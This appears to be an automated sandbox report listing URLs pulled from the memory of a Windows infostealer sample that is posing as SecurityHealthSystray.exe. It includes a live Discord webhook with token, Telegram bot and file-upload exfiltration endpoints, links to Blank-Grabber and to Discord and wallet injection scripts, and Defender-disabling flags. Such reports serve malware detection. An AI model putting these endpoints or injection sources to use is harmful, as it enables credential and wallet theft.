                        Source: powershell.exe, 00000014.00000002.1689641102.00000239837E9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/wsdl/
                        Source: program.exe, 00000008.00000002.1941153188.00000237A51F0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://tools.ietf.org/html/rfc6125#section-6.4.3
                        Source: program.exe, 00000005.00000003.1524454201.00000139887E0000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000005.00000003.1524726807.00000139887ED000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ts-aia.ws.symantec.com/sha256-tss-ca.cer0(
                        Source: program.exe, 00000005.00000003.1524454201.00000139887E0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ts-aia.ws.symantec.com/tss-ca-g2.cer0
                        Source: program.exe, 00000005.00000003.1524454201.00000139887E0000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000005.00000003.1524726807.00000139887ED000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ts-crl.ws.symantec.com/sha256-tss-ca.crl0
                        Source: program.exe, 00000005.00000003.1524454201.00000139887E0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ts-crl.ws.symantec.com/tss-ca-g2.crl0(
                        Source: program.exe, 00000005.00000003.1524454201.00000139887E0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ts-ocsp.ws.symantec.com07
                        Source: program.exe, 00000005.00000003.1524454201.00000139887E0000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000005.00000003.1524726807.00000139887ED000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ts-ocsp.ws.symantec.com0;
                        Source: powershell.exe, 00000033.00000002.1693664914.000001F881653000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
                        Source: powershell.exe, 00000033.00000002.1693664914.000001F881910000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
                        Source: program.exe, 00000005.00000003.1522617049.00000139887E0000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000005.00000003.1525014783.00000139887E0000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000005.00000003.1518928868.00000139887E0000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000005.00000003.1523219477.00000139887E0000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000005.00000003.1522795628.00000139887E0000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000005.00000002.1959967086.00000139887ED000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000005.00000003.1518152976.00000139887DF000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000005.00000003.1519577277.00000139887E0000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000005.00000003.1521981805.00000139887E0000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000005.00000003.1518342111.00000139887E0000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000005.00000003.1525292752.00000139887E0000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000005.00000003.1524879211.00000139887E0000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000005.00000003.1519976627.00000139887E0000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000005.00000003.1519169307.00000139887E0000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000005.00000003.1519414521.00000139887E0000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000005.00000003.1519755657.00000139887E0000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000005.00000003.1518687948.00000139887E0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.digicert.com/CPS0
                        Source: program.exe, 00000008.00000002.1939236456.00000237A4C7B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.iana.org/assignments/tls-parameters/tls-parameters.xml#tls-parameters-6
                        Source: program.exe, 00000008.00000002.1947748964.00000237A5906000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000008.00000003.1747910715.00000237A5906000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000008.00000002.1941288303.00000237A536C000.00000004.00001000.00020000.00000000.sdmp, program.exe, 00000008.00000003.1715550482.00000237A5906000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000008.00000003.1663641819.00000237A5906000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000008.00000003.1936233267.00000237A5906000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000008.00000003.1638117750.00000237A5906000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://MD8.mozilla.org/1/m
                        Source: program.exe, 00000008.00000003.1743204693.00000237A58BC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                        Source: program.exe, 00000008.00000003.1715550482.00000237A5914000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000008.00000003.1638117750.00000237A5916000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000008.00000002.1941288303.00000237A53F8000.00000004.00001000.00020000.00000000.sdmp, program.exe, 00000008.00000003.1936233267.00000237A5914000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000008.00000003.1743204693.00000237A5914000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://account.bellmedia.c
                        Source: powershell.exe, 00000014.00000002.1689641102.00000239835C1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000033.00000002.1693664914.000001F880001000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
                        Source: program.exe, 00000008.00000002.1941288303.00000237A53AC000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://allegro.pl/
                        Source: program.exe, 00000008.00000002.1939141033.00000237A49E0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://api.anonfiles.com/upload
                        Source: program.exe, 00000008.00000002.1939141033.00000237A49E0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://api.gofile.io/getServer
                        Source: skuld.exe, 00000003.00000002.1549558501.00000000011C5000.00000002.00000001.01000000.00000007.sdmp, SecurityHealthSystray.exe, 00000036.00000002.1700904810.00000000010B5000.00000002.00000001.01000000.0000001E.sdmp, SecurityHealthSystray.exe, 0000004A.00000000.1680272657.00000000010B5000.00000002.00000001.01000000.0000001E.sdmpString found in binary or memory: https://api.gofile.io/getServerhttps://%s.gofile.io/uploadFilesql:
                        Source: skuld.exe, 00000003.00000002.1549558501.00000000011C5000.00000002.00000001.01000000.00000007.sdmp, SecurityHealthSystray.exe, 00000036.00000002.1700904810.00000000010B5000.00000002.00000001.01000000.0000001E.sdmp, SecurityHealthSystray.exe, 0000004A.00000000.1680272657.00000000010B5000.00000002.00000001.01000000.0000001E.sdmpString found in binary or memory: https://api.ipify.org/-DisableIOAVProtection-DisableScriptScanning%s
                        Source: program.exe, 00000008.00000002.1939141033.00000237A49E0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot
                        Source: program.exe, 00000008.00000002.1939141033.00000237A49E0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/botP
                        Source: skuld.exe, 00000003.00000002.1549558501.00000000011C5000.00000002.00000001.01000000.00000007.sdmp, SecurityHealthSystray.exe, 00000036.00000002.1700904810.00000000010B5000.00000002.00000001.01000000.0000001E.sdmp, SecurityHealthSystray.exe, 0000004A.00000000.1680272657.00000000010B5000.00000002.00000001.01000000.0000001E.sdmpString found in binary or memory: https://avatars.githubusercontent.com/u/145487845?v=4sqlite:
                        Source: program.exe, 00000008.00000002.1941288303.00000237A53AC000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://bugzilla.mo
                        Source: program.exe, 00000008.00000003.1743204693.00000237A58BC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                        Source: program.exe, 00000008.00000003.1743204693.00000237A58BC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                        Source: program.exe, 00000008.00000003.1743204693.00000237A58BC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                        Source: powershell.exe, 00000033.00000002.1831279300.000001F89007B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
                        Source: powershell.exe, 00000033.00000002.1831279300.000001F89007B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
                        Source: powershell.exe, 00000033.00000002.1831279300.000001F89007B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
                        Source: program.exe, 00000005.00000003.1524454201.00000139887E0000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000005.00000003.1524726807.00000139887ED000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://d.symcb.com/cps0%
                        Source: program.exe, 00000005.00000003.1524454201.00000139887E0000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000005.00000003.1524726807.00000139887ED000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://d.symcb.com/rpa0
                        Source: program.exe, 00000005.00000003.1524454201.00000139887E0000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000005.00000003.1524726807.00000139887ED000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://d.symcb.com/rpa0.
                        Source: SecurityHealthSystray.exe, 0000004A.00000000.1680272657.00000000010B5000.00000002.00000001.01000000.0000001E.sdmpString found in binary or memory: https://discord.com/api/v9/users/
                        Source: program.exe, 00000008.00000002.1941021680.00000237A50E0000.00000004.00001000.00020000.00000000.sdmp, SecurityHealthSystray.exe, 00000036.00000002.1700904810.00000000010B5000.00000002.00000001.01000000.0000001E.sdmp, SecurityHealthSystray.exe, 0000004A.00000000.1680272657.00000000010B5000.00000002.00000001.01000000.0000001E.sdmpString found in binary or memory: https://discord.com/api/webhooks/1298867906041479188/X0YmXSYYuFGsCIlZL1CQlv_GeIoIWc3S1cksX7_7_e4Onj-
                        Source: program.exe, 00000008.00000002.1939141033.00000237A49E0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://discordapp.com/api/v9/users/
                        Source: program.exe, 00000008.00000002.1938588123.00000237A44A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.python.org/3.11/library/binascii.html#binascii.a2b_base64
                        Source: program.exe, 00000008.00000002.1939044962.00000237A48E0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://docs.python.org/3/howto/mro.html.
                        Source: program.exe, 00000008.00000002.1938239957.00000237A4200000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://docs.python.org/3/library/importlib.html#importlib.abc.ExecutionLoader.get_filename
                        Source: program.exe, 00000008.00000002.1938239957.00000237A4200000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://docs.python.org/3/library/importlib.html#importlib.abc.InspectLoader.get_code
                        Source: program.exe, 00000008.00000002.1938239957.00000237A4284000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://docs.python.org/3/library/importlib.html#importlib.abc.InspectLoader.get_source
                        Source: program.exe, 00000008.00000002.1938239957.00000237A4200000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://docs.python.org/3/library/importlib.html#importlib.abc.InspectLoader.is_package
                        Source: program.exe, 00000008.00000002.1938239957.00000237A4284000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://docs.python.org/3/library/importlib.html#importlib.abc.Loader.create_module
                        Source: program.exe, 00000008.00000002.1938239957.00000237A4200000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://docs.python.org/3/library/importlib.html#importlib.abc.Loader.exec_module
                        Source: program.exe, 00000008.00000002.1938239957.00000237A4200000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://docs.python.org/3/library/importlib.html#importlib.abc.MetaPathFinder.invalidate_caches
                        Source: program.exe, 00000008.00000002.1938239957.00000237A4200000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://docs.python.org/3/library/importlib.html#importlib.abc.PathEntryFinder.find_spec
                        Source: program.exe, 00000008.00000002.1938022235.00000237A29C7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.python.org/3/library/importlib.html#importlib.abc.ResourceLoader.get_data
                        Source: program.exe, 00000008.00000003.1743204693.00000237A58BC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
                        Source: program.exe, 00000008.00000003.1743204693.00000237A58BC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
                        Source: program.exe, 00000008.00000003.1743204693.00000237A58BC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                        Source: program.exe, 00000008.00000002.1940797595.00000237A4EE0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://foss.heptapod.net/pypy/pypy/-/issues/3539
                        Source: program.exe, 00000008.00000002.1938588123.00000237A4503000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/Blank-c/Blank-Grabber
                        Source: program.exe, 00000008.00000003.1538839445.00000237A4EE8000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000008.00000003.1539582837.00000237A4BB4000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000008.00000003.1539939884.00000237A4BB6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/Blank-c/BlankOBF
                        Source: powershell.exe, 00000033.00000002.1693664914.000001F881910000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
                        Source: program.exe, 00000008.00000002.1938022235.00000237A29C7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/Unidata/MetPy/blob/a3424de66a44bf3a92b0dcacf4dff82ad7b86712/src/metpy/plots/wx_sy
                        Source: skuld.exe, 00000003.00000002.1549558501.00000000011C5000.00000002.00000001.01000000.00000007.sdmp, SecurityHealthSystray.exe, 00000036.00000002.1700904810.00000000010B5000.00000002.00000001.01000000.0000001E.sdmp, SecurityHealthSystray.exe, 0000004A.00000000.1680272657.00000000010B5000.00000002.00000001.01000000.0000001E.sdmpString found in binary or memory: https://github.com/hackirby/wallets-injection/raw/main/atomic.asarhttps://github.com/hackirby/wallet
                        Source: program.exe, 00000008.00000002.1938239957.00000237A4284000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/python/cpython/blob/3.9/Lib/importlib/_bootstrap_external.py#L679-L688
                        Source: program.exe, 00000008.00000002.1938022235.00000237A29C7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/python/cpython/blob/839d7893943782ee803536a47f1d4de160314f85/Lib/importlib/abc.py
                        Source: program.exe, 00000008.00000002.1938022235.00000237A29C7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/python/cpython/blob/839d7893943782ee803536a47f1d4de160314f85/Lib/importlib/reader
                        Source: program.exe, 00000008.00000002.1938769127.00000237A4838000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000008.00000003.1550346820.00000237A4819000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000008.00000003.1550188976.00000237A4C8B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/python/cpython/issues/86361.
                        Source: program.exe, 00000008.00000002.1941153188.00000237A51F0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/python/importlib_metadata/wiki/Development-Methodology
                        Source: program.exe, 00000008.00000002.1938022235.00000237A29C7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/tensorflow/datasets/blob/master/tensorflow_datasets/core/utils/resource_utils.py#
                        Source: program.exe, 00000008.00000002.1940797595.00000237A4EE0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/urllib3/urllib3/issues/2192#issuecomment-821832963
                        Source: program.exe, 00000008.00000002.1938769127.00000237A46E0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/urllib3/urllib3/issues/2513#issuecomment-1152559900.
                        Source: program.exe, 00000008.00000002.1941153188.00000237A51F0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/urllib3/urllib3/issues/2920
                        Source: program.exe, 00000008.00000002.1941153188.00000237A51F0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/urllib3/urllib3/issues/3290
                        Source: program.exe, 00000008.00000002.1941153188.00000237A51F0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/urllib3/urllib3/issues/32902
                        Source: powershell.exe, 00000033.00000002.1693664914.000001F880ED8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://go.micro
                        Source: program.exe, 00000008.00000002.1939870839.00000237A4D8E000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000008.00000003.1935121901.00000237A4E1C000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000008.00000003.1593036472.00000237A4D8E000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000008.00000003.1666115991.00000237A4E1C000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000008.00000002.1939908324.00000237A4E1C000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000008.00000003.1578204766.00000237A4E16000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000008.00000003.1936998736.00000237A4D8B000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000008.00000003.1749300110.00000237A4D8B000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000008.00000003.1728396293.00000237A4E1C000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000008.00000002.1938769127.00000237A47E8000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000008.00000003.1589347367.00000237A4E16000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000008.00000002.1938588123.00000237A4503000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://google.com/
                        Source: program.exe, 00000008.00000002.1938769127.00000237A47E8000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000008.00000002.1938588123.00000237A4503000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://google.com/mail
                        Source: program.exe, 00000008.00000002.1938769127.00000237A46E0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://google.com/mail/
                        Source: program.exe, 00000008.00000002.1939141033.00000237A49E0000.00000004.00001000.00020000.00000000.sdmp, program.exe, 00000008.00000003.1549428382.00000237A4819000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gstatic.com/generate_204
                        Source: program.exe, 00000008.00000002.1939236456.00000237A4D49000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://html.spec.whatwg.org/multipage/
                        Source: program.exe, 00000008.00000003.1589347367.00000237A4E16000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://httpbin.org/
                        Source: skuld.exe, 00000003.00000002.1549558501.00000000011C5000.00000002.00000001.01000000.00000007.sdmp, SecurityHealthSystray.exe, 00000036.00000002.1700904810.00000000010B5000.00000002.00000001.01000000.0000001E.sdmp, SecurityHealthSystray.exe, 0000004A.00000000.1680272657.00000000010B5000.00000002.00000001.01000000.0000001E.sdmpString found in binary or memory: https://i.ibb.co/GFZ2tHJ/shakabaiano-1674282487.jpgJSON
                        Source: program.exe, 00000008.00000003.1544671007.00000237A4C47000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://json.org
                        Source: program.exe, 00000008.00000002.1948709723.00000237A62D4000.00000004.00001000.00020000.00000000.sdmp, program.exe, 00000008.00000003.1638117750.00000237A5916000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000008.00000003.1936233267.00000237A5914000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000008.00000003.1743204693.00000237A5914000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com
                        Source: program.exe, 00000008.00000003.1715550482.00000237A5914000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000008.00000003.1638117750.00000237A5916000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000008.00000002.1948709723.00000237A62E4000.00000004.00001000.00020000.00000000.sdmp, program.exe, 00000008.00000003.1936233267.00000237A5914000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000008.00000003.1743204693.00000237A5914000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.microsoftonline.com
                        Source: powershell.exe, 00000014.00000002.1825728289.0000023993632000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000033.00000002.1693664914.000001F88196B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000033.00000002.1831279300.000001F8901BD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000033.00000002.1831279300.000001F89007B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
                        Source: powershell.exe, 00000033.00000002.1693664914.000001F881653000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://oneget.org
                        Source: powershell.exe, 00000033.00000002.1693664914.000001F881653000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://oneget.orgX
                        Source: program.exe, 00000008.00000002.1941021680.00000237A50E0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://packaging.python.org/en/latest/specifications/core-metadata/#core-metadata
                        Source: program.exe, 00000008.00000002.1938769127.00000237A4838000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://packaging.python.org/en/latest/specifications/entry-points/#file-format
                        Source: program.exe, 00000008.00000002.1938769127.00000237A4838000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://packaging.python.org/en/latest/specifications/recording-installed-packages/#the-record-file
                        Source: program.exe, 00000008.00000002.1941153188.00000237A51F0000.00000004.00001000.00020000.00000000.sdmp, program.exe, 00000008.00000002.1940908423.00000237A4FE0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://packaging.python.org/specifications/entry-points/
Source: program.exe, 00000008.00000003.1538192447.00000237A4790000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000008.00000003.1528214217.00000237A44A1000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000008.00000002.1939141033.00000237A49E0000.00000004.00001000.00020000.00000000.sdmp, program.exe, 00000008.00000003.1532943385.00000237A4790000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000008.00000003.1537466500.00000237A4790000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://peps.python.org/pep-0205/
Source: program.exe, 00000008.00000002.1953128317.00007FFBAA8E8000.00000040.00000001.01000000.0000000A.sdmp | String found in binary or memory: https://peps.python.org/pep-0263/
Source: program.exe, 00000008.00000002.1938588123.00000237A4503000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://raw.githubusercontent.com/Blank-c/Blank-Grabber/main/.github/workflows/image.png
Source: skuld.exe, 00000003.00000002.1549558501.00000000011C5000.00000002.00000001.01000000.00000007.sdmp, SecurityHealthSystray.exe, 00000036.00000002.1700904810.00000000010B5000.00000002.00000001.01000000.0000001E.sdmp, SecurityHealthSystray.exe, 0000004A.00000000.1680272657.00000000010B5000.00000002.00000001.01000000.0000001E.sdmp | String found in binary or memory: https://raw.githubusercontent.com/hackirby/discord-injection/main/injection.js1157920892103562487626
Source: program.exe, 00000005.00000003.1524454201.00000139887E0000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://sectigo.com/CPS0
Source: program.exe, 00000008.00000003.1599083346.00000237A4E68000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000008.00000003.1590319286.00000237A5872000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000008.00000003.1593084728.00000237A4E68000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000008.00000003.1601850768.00000237A4E68000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000008.00000003.1600386018.00000237A5872000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://support.mozilla.org
Source: program.exe, 00000008.00000003.1592258018.00000237A587E000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000008.00000003.1601019406.00000237A4EBC000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000008.00000003.1578204766.00000237A4E82000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000008.00000003.1578004060.00000237A587E000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000008.00000003.1595529292.00000237A587E000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000008.00000003.1589347367.00000237A4E16000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000008.00000003.1599043044.00000237A4EBC000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000008.00000003.1580291828.00000237A587E000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
Source: program.exe, 00000008.00000003.1592258018.00000237A587E000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000008.00000003.1578204766.00000237A4E82000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000008.00000003.1578004060.00000237A587E000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000008.00000003.1595529292.00000237A587E000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000008.00000003.1580291828.00000237A587E000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000008.00000002.1938769127.00000237A46E0000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://support.mozilla.org/products/firefox
Source: program.exe, 00000008.00000003.1599043044.00000237A4EBC000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://support.mozilla.org/products/firefoxgro.all
Source: program.exe, 00000008.00000003.1601019406.00000237A4EBC000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://support.mozilla.org/products/firefoxgro.allizom.troppus.elMx_wJzrE6l
Source: program.exe, 00000008.00000002.1939236456.00000237A4AE0000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://tools.ietf.org/html/rfc2388#section-4.4
Source: program.exe, 00000008.00000002.1939236456.00000237A4AE0000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://tools.ietf.org/html/rfc7231#section-4.3.6)
Source: program.exe, 00000008.00000002.1939870839.00000237A4D8E000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000008.00000003.1935121901.00000237A4E1C000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000008.00000003.1593036472.00000237A4D8E000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000008.00000003.1666115991.00000237A4E1C000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000008.00000002.1939908324.00000237A4DD3000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000008.00000002.1939908324.00000237A4E1C000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000008.00000003.1578204766.00000237A4E16000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000008.00000003.1936998736.00000237A4D8B000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000008.00000003.1749300110.00000237A4D8B000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000008.00000003.1728396293.00000237A4E1C000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000008.00000002.1941288303.00000237A53AC000.00000004.00001000.00020000.00000000.sdmp, program.exe, 00000008.00000003.1589347367.00000237A4E16000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000008.00000003.1728396293.00000237A4DD3000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://twitter.com/
Source: program.exe, 00000008.00000002.1941021680.00000237A50E0000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: https://urllib3.readthedocs.io/en/latest/advanced-usage.html#https-proxy-error-http-proxy
Source: program.exe, 00000008.00000002.1941021680.00000237A50E0000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: https://urllib3.readthedocs.io/en/latest/advanced-usage.html#tls-warnings
Source: program.exe, 00000008.00000002.1941288303.00000237A53E0000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: https://weibo.com/
Source: program.exe, 00000008.00000003.1638117750.00000237A58EF000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000008.00000002.1941288303.00000237A53AC000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: https://www.aliexpress.com/
Source: program.exe, 00000008.00000003.1638117750.00000237A58EF000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.amazon.ca/
Source: program.exe, 00000008.00000002.1941288303.00000237A5300000.00000004.00001000.00020000.00000000.sdmp, program.exe, 00000008.00000003.1638117750.00000237A58EF000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000008.00000002.1939908324.00000237A4DD3000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000008.00000003.1728396293.00000237A4DD3000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.amazon.com/
Source: program.exe, 00000008.00000003.1638117750.00000237A58EF000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.amazon.de/
Source: program.exe, 00000008.00000003.1638117750.00000237A58EF000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.amazon.fr/
Source: program.exe, 00000008.00000002.1941153188.00000237A51F0000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: https://www.avito.ru/
